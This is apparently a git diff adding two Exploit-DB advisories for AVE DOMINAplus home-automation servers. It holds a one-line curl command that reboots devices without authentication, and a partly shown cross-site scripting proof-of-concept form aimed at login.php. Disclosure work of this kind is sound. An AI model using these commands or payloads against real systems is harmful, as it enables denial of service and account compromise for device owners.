1.10.77 + App version: 1.10.65 + App version: 1.10.64 + App version: 1.10.62 + App version: 1.10.60 + App version: 1.10.52 + App version: 1.10.52A + App version: 1.10.49 + App version: 1.10.46 + App version: 1.10.45 + App version: 1.10.44 + App version: 1.10.35 + App version: 1.10.25 + App version: 1.10.22 + App version: 1.10.11 + App version: 1.8.4 + App version: TS1-1.0.65 + App version: TS1-1.0.62 + App version: TS1-1.0.44 + App version: TS1-1.0.10 + App version: TS1-1.0.9 + +Summary: DOMINAplus - Sistema Domotica Avanzato. Advanced Home Automation System. +Designed to revolutionize your concept of living. DOMINA plus is the AVE home +automation proposal that makes houses safer, more welcoming and optimized. In +fact, our home automation system introduces cutting-edge technologies, designed +to improve people's lifestyle. DOMINA plus increases comfort, the level of safety +and security and offers advanced supervision tools in order to learn how to +evaluate and reduce consumption through various solutions dedicated to energy +saving. + +Desc: The application suffers from an unauthenticated reboot command execution. +Attackers can exploit this issue to cause a denial of service scenario. + +Tested on: GNU/Linux 4.1.19-armv7-x7 + GNU/Linux 3.8.13-bone50/bone71.1/bone86 + Apache/2.4.7 (Ubuntu) + Apache/2.2.22 (Debian) + PHP/5.5.9-1ubuntu4.23 + PHP/5.4.41-0+deb7u1 + PHP/5.4.36-0+deb7u3 + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2019-5548 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5548.php + + +06.10.2019 + +-- + +curl -sk https://192.168.1.10/restart.php >/dev/null \ No newline at end of file diff --git a/exploits/hardware/webapps/47821.txt b/exploits/hardware/webapps/47821.txt new file mode 100644 index 000000000..dc49a98ea --- /dev/null +++ b/exploits/hardware/webapps/47821.txt @@ -0,0 +1,108 @@ +# Exploit: AVE DOMINAplus 1.10.x - Cross-Site Request Forgery (enable/disable alarm) +# Date: 2019-12-30 +# Author: LiquidWorm +# Vendor: AVE S.p.A. +# Product web page: https://www.ave.it | https://www.domoticaplus.it +# Affected version: Web Server Code 53AB-WBS - 1.10.62 +# Advisory ID: ZSL-2019-5547 +# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5547.php + +AVE DOMINAplus <=1.10.x CSRF/XSS Vulnerabilities + + +Vendor: AVE S.p.A. +Product web page: https://www.ave.it | https://www.domoticaplus.it +Affected version: Web Server Code 53AB-WBS - 1.10.62 + Touch Screen Code TS01 - 1.0.65 + Touch Screen Code TS03x-V | TS04X-V - 1.10.45a + Touch Screen Code TS05 - 1.10.36 + Models: 53AB-WBS + TS01 + TS03V + TS04X-V + TS05N-V + App version: 1.10.77 + App version: 1.10.65 + App version: 1.10.64 + App version: 1.10.62 + App version: 1.10.60 + App version: 1.10.52 + App version: 1.10.52A + App version: 1.10.49 + App version: 1.10.46 + App version: 1.10.45 + App version: 1.10.44 + App version: 1.10.35 + App version: 1.10.25 + App version: 1.10.22 + App version: 1.10.11 + App version: 1.8.4 + App version: TS1-1.0.65 + App version: TS1-1.0.62 + App version: TS1-1.0.44 + App version: TS1-1.0.10 + App version: TS1-1.0.9 + +Summary: DOMINAplus - Sistema Domotica Avanzato. Advanced Home Automation System. +Designed to revolutionize your concept of living. DOMINA plus is the AVE home +automation proposal that makes houses safer, more welcoming and optimized. In +fact, our home automation system introduces cutting-edge technologies, designed +to improve people's lifestyle. DOMINA plus increases comfort, the level of safety +and security and offers advanced supervision tools in order to learn how to +evaluate and reduce consumption through various solutions dedicated to energy +saving. + +Desc: The application suffers from multiple CSRF and XSS vulnerabilities. The +application allows users to perform certain actions via HTTP requests without +performing any validity checks to verify the requests. This can be exploited +to perform certain actions with administrative privileges if a logged-in user +visits a malicious web site. Input passed to several GET/POST parameters is not +properly sanitised before being returned to the user. This can be exploited to +execute arbitrary HTML and script code in a user's browser session in context +of an affected site. + +Tested on: GNU/Linux 4.1.19-armv7-x7 + GNU/Linux 3.8.13-bone50/bone71.1/bone86 + Apache/2.4.7 (Ubuntu) + Apache/2.2.22 (Debian) + PHP/5.5.9-1ubuntu4.23 + PHP/5.4.41-0+deb7u1 + PHP/5.4.36-0+deb7u3 + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2019-5547 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5547.php + + +06.10.2019 + +-- + + +Reflected XSS in User and Password POST parameters in login.php: +-- + + +
+ + SLIDERS</marquee>" /> +